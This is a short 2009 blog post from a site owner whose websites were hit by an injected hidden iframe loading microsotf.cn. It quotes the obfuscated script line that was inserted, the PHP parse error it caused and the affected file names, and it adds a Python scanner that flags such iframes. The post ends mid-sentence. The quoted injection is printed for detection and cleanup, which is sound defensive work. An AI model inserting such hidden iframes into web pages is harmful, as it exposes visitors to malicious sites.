Web site hack loading microsotf.cn

Filed Under Hacks and Mods on 2009-07-06, 15:21

I came back from vacation to find that some of my sites had been compromised. If you’re also someone who has websites that have been compromised with an iframe loading microsotf.cn, please join the conversation on freenode (chat.freenode.com) in #microsotf.cn. If you don’t have an IRC client, you can use the webchat. Here are some symptoms that hopefully Google will index and help you find this post:

The inserted code:

echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';

The syntax error that appears:

Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ',' or ';'

It appears the affected files are index.php, index.html and login.php.
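To check a web root for this injection, the following added example (not part of the original post) rejoins the concatenated string fragments in the injected line and reports any iframe whose width and height are both 2 pixels or less in files named index.php, index.html or login.php. The function names and the 2-pixel threshold are assumptions chosen for illustration.

```python
import re
from pathlib import Path

# File names the post reports as affected.
TARGET_NAMES = {"index.php", "index.html", "login.php"}
# The injected line as quoted in the post (raw string keeps the backslashes).
SAMPLE = r'''echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';'''

# A closing quote, '+', an opening quote: the seam between two concatenated
# string literals. Deleting every seam rejoins the split-up text.
SEAM = re.compile(r"""["']\s*\+\s*["']""")
IFRAME_TAG = re.compile(
    r"""<iframe\b[^>]*\bsrc=\\?["']?(?P<src>[^\s"'\\>]+)[^>]*>""", re.I)
DIMENSION = re.compile(r"""\b(?:width|height)=\\?["']?(\d+)""", re.I)


def collapse_concatenation(text):
    """Rejoin 'a'+"b" style fragments until nothing changes."""
    previous = None
    while previous != text:
        previous, text = text, SEAM.sub("", text)
    return text


def find_hidden_iframes(text, max_px=2):
    """Return src values of iframes whose width and height are both <= max_px."""
    hits = []
    for match in IFRAME_TAG.finditer(collapse_concatenation(text)):
        sizes = [int(n) for n in DIMENSION.findall(match.group(0))]
        if len(sizes) >= 2 and max(sizes) <= max_px:
            hits.append(match.group("src"))
    return hits


def scan_tree(root):
    """Map each affected-looking file under root to the iframe sources found."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name in TARGET_NAMES:
            found = find_hidden_iframes(path.read_text(errors="replace"))
            if found:
                report[str(path)] = found
    return report


if __name__ == "__main__":
    print(find_hidden_iframes(SAMPLE))
```

Run `scan_tree` against a copy of the document root; a hit means the file should be restored from a known-good backup rather than edited by hand.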

This is the IP you should block the hell out of: